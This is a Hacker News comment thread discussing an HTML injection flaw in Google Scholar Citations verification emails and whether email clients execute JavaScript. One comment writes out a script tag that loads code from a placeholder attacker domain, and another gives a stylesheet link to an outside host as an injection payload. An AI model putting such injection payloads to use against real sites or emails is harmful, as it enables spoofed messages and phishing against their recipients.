Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I agree on the subject line (which is "Verify your email address") and that the mail is sent from "Google Scholar Citations", but as it was possible to include arbitrary CSS files, the content could be changed to pretty much anything... Although there was a length-restriction on the user's name, there were two other fields that weren't escaped properly and thus could be used to insert more HTML-content.


>Although there was a length-restriction on the user's name

As long as any field allows enough chars to:

<script src="http://evilbadpersondomain.com/forTheLulz.js"></script>

....anything is possible from there.


There are email clients that execute JavaScript?


Ah, yeah smartphone and desktop apps don't do js(afaik) - but the web-browser access is still big. If gmail's web interface went down for a day, I think a lot of people would notice.


Gmail doesn't run JavaScript in e-mails, though.


I am not sure - when you post enough js-code into a gmail compose "window" it will crash.


My guess: the WYSIWYG editor uses its own HTML parser and filter, written in JavaScript, that has some O(n^terrible) corner case that your paste test is hitting.


I don't know of any email clients that execute JS inside mails. I don't think we will see such clients anytime soon.


Make that `<link rel=stylesheet href=http://ø.xx>` as JavaScript won't execute in recent mail clients.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: